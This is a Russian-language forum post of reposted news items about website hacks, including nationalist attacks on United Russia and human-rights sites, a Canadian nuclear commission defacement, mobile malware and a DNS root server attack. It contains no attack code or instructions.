Этим сообщением, подготовленным молодыми помощниками Н. Курьяновича, одновременно состоящими в ДПНИ, заканчивается история интернет-борцов с нелегальной иммиграцией. Испуг «национал-оранжистов» из ДПНИ в связи со стартом «Русского проекта» «Единой России» оказался слишком велик, и они применили свое самое последнее «оружие» - взломали сайты «Единой России» и «Молодой Гвардии». Но тем самым ДПНИ и различного рода «русские порядки» лишь еще раз доказали: деятельность «националистов» носит исключительно виртуальный характер и на что-то большее, чем взлом чужих сайтов, они не способны. ДПНИ может сколько угодно создавать копии своего сайта (например, dpni2.org), кричать о введении «цензуры» в интернете, но отныне их будут воспринимать только как надоедливых малолеток, мешающихся под ногами, которые засоряют своим спамом мозги пользователям интернета. По статистике, лишь 5% пользователей интернета обращают внимание на информацию, распространяемую спамерами. Почитателей виртуальных «талантов» ДПНИ и прочих «русских порядков» в Рунете станет еще меньше после этой бездарной выходки по взлому сайтов «Единой России» и МГЕР. Кроме того, напомним, что согласно статье 272 УК РФ, за взлом чужих сайтов устанавливается наказание в виде лишения свободы на срок до 2 лет. Лидеру ДПНИ А. Поткину (Белову) следует серьезно задуматься по поводу этой информации. Ведь одно уголовное дело, возбужденное в связи с беспорядками в Кондопоге, он уже имеет. . .

Хакеры атаковали сайт московских правозащитников
[ Новые нападения ]

Хакеры атаковали сайт Московского бюро по правам человека (МБПЧ), ведущей российской правозащитной организации, которая, при поддержке Евросоюза, ведет мониторинг ксенофобии в России.
"Наш сайт был атакован хакерами в понедельник в районе полудня. Все материалы сайта были уничтожены", - сказал директор МБПЧ Александр Брод, передает «Интерфакс-Украина».

По его словам, у правозащитников есть архив материалов, и в настоящее время принимаются меры, чтобы восстановить работу сайта.

«Мы не знаем, кто стоит за хакерской атакой. Никаких следов люди, взломавшие сайт, не оставили», - сказал Брод, отметив, что в ближайшее время правозащитники намерены обратиться в правоохранительные органы в связи со взломом сайта МБПЧ.

«В последнее время мы получали угрозы от неизвестных по электронной почте. Как правило, это были угрозы со стороны представителей радикально-националистических организаций», - сказал Брод.

Он отметил, что правозащитники в прошлом пытались привлечь внимание правоохранительных органов к угрозам со стороны национал-радикалов в адрес общественных организаций.

«Не знаю ни одного случая, когда националистические организации, которые участвуют во взломе сайтов, несут какую-либо ответственность», - сказал Брод.

В прошлом хакеры взламывали сайт Московской Хельсинской группы, тогда ответственность за взлом взяло на себя одно из ультраправых национал-социалистических движений. Также атакам хакеров подвергались сайты Московской синагоги на улице Большая Бронная, Московского и Смоленского отделений «Союза правых сил», Всемирного конгресса русскоязычного еврейства.

В 2005 году хакеры взламывали Итернет-ресурсы аналитического центра «Сова», «Союза коммунистической молодежи», «Глобального еврейского он лайн-центра» «В последнее время наблюдается тенденция к росту активности хакеров. Как правило, жертвами становятся сайты антифашистских правозащитных организаций, еврейских общин или организаций демократической направленности», - сказал руководитель МБПЧ.

Взломан сайт Канадской комиссии по ядерной безопасности
[ Новые нападения ]

Сайт Канадской комиссии по ядерной безопасности был взломан. На нем была размещена фотография ядерного взрыва. По утверждению официального представителя комиссии, результатом взлома стала порча раздела с релизами. По его мнению, получить доступ к потенциально опасным материалам комиссии (например, к документам о передвижении радиоактивных материалов) у хакера не получилось - для это требуется специальный правительственный доступ. К тому же дефейс был произведен на сайте, который запущен внешним провайдером и не имеет связи с внутренней сетью организации, сообщил cnews.ru. Сейчас сайт работает в обычном режиме.

Хакеры начинают атаки на смартфоны
[ Новые нападения ]

Появление новых банковских услуг для пользователей мобильных телефонов может спровоцировать в текущем году массовые атаки хакеров на мобильники. Об этом предупреждают эксперты исследовательской группы Tower Group.

По мнению аналитиков, существующий уровень зашиты приложений для мобильной коммерции по-прежнему оставляет желать лучшего. Все чаще мобильные телефоны выполняют функцию своеобразного "электронного кошелька", который может быть использован как альтернатива традиционной дебетовой или кредитной карты.

Эксперты Tower Group считают, что успех банковских и платежных мобильных сервисов будет напрямую зависеть от того, насколько своевременно и эффективно игроки рынка будут бороться с проблемами, которые возникают из-за вредоносного программного обеспечения. На сегодняшний день идентифицированы свыше двухсот мобильных вирусов, причем почти каждые шесть месяцев количество вредоносных программ удваивается.

Хакеры чуть не вывели из строя доменную зону .org
[ Новые нападения ]

Интернет подвергся наиболее значительной хакерской атаке с 2002 года, передает Associated Press. Злоумышленникам удалось на краткое время получить контроль как минимум над тремя из тринадцати "корневых DNS-серверов" - компьютеров, обеспечивающих управление потоками данных в глобальной сети.
Атака продолжалась не менее двенадцати часов, но осталась незамеченной для большинства пользователей. Инженерам, обеспечивающим функционирование информационных каналов по всему миру, удалось справиться с экстремальными объемами данных, грозивших перегрузить сети.
По словам Дуэйна Весселза (Duane Wessels,), исследователя из Cooperative Association for Internet Data Analysis, цель атаки остается неизвестной. Хакеры не сообщили о своем происхождении, отметил эксперт, но "следы ведут в Южную Корею".
Непосредственным объектом атаки выступала компания UltraDNS, управляющая серверами, обеспечивающими доступность сайтов доменных зон org и ряда других.

0

4

Мы переехали!  http://GrOzNeR-vU.oRg.Ru  тут есть все! форум, чат, загрузки а так же все для wap/wеb мастеру!

0


Вы здесь » Другой Мир » ВСЁ ДЛЯ W@P/WEB-МАСТЕРА » Уроки хакерства